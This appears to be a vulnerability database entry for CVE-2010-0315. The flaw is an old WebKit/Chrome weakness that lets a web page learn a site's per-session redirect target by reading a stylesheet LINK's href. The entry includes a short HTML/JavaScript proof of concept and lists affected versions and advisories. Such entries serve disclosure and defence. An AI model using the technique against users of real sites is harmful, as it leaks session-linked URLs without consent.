Google Chrome WebKit LINK Element HREF Attribute URL Redirection Vulnerability

Vulnerability ID: 1118936
Vulnerability type: Other
Published: 2010-01-22
Updated: 2010-01-25
CVE ID: CVE-2010-0315
CNNVD-ID: CNNVD-201001-139
Platform: Multiple
CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/33562
https://www.securityfocus.com/bid/37917
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-139
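|Vulnerability Details
WebKit before r53607, as used in Google Chrome before 4.0.249.89, contains a URL redirection vulnerability. A remote attacker can set the HREF attribute of a stylesheet LINK element to the URL of a web site and then read the document.styleSheets[0].href property value to discover a redirect target URL for a specific user's session on that site.
|Exploit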
source: http://www.securityfocus.com/bid/37917/info

Google Chrome is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 

<link rel="stylesheet" type="text/css" href="http://www.example.com">
Hola
<script language="javascript">
// setTimeout is used just to wait for page loading
setTimeout("alert(document.styleSheets[0].href)", 10000);
</script>
|Affected Products
Google Chrome 3.0.195.33
Google Chrome 3.0.195.32
Google Chrome 3.0.195.24
Google Chrome 3.0.195.21
Google Chrome 3.0 Beta
|References

Source: bugs.webkit.org
Link: https://bugs.webkit.org/show_bug.cgi?id=33683
Source: XF
Name: googlechrome-iframe-info-disc(56215)
Link: http://xforce.iss.net/xforce/xfdb/56215
Source: VUPEN
Name: ADV-2010-0361
Link: http://www.vupen.com/english/advisories/2010/0361
Source: BID
Name: 38177
Link: http://www.securityfocus.com/bid/38177
Source: trac.webkit.org
Link: http://trac.webkit.org/changeset/53607
Source: sites.google.com
Link: http://sites.google.com/a/chromium.org/dev/Home/chromium-security/chromium-security-bugs
Source: SECTRACK
Name: 1023583
Link: http://securitytracker.com/id?1023583
Source: SECUNIA
Name: 38545
Link: http://secunia.com/advisories/38545
Source: MISC
Link: http://nomoreroot.blogspot.com/2010/01/little-bug-in-safari-and-google-chrome.html
Source: googlechromereleases.blogspot.com
Link: http://googlechromereleases.blogspot.com/2010/02/stable-channel-update.html
Source: code.google.com
Link: http://code.google.com/p/chromium/issues/detail?id=32309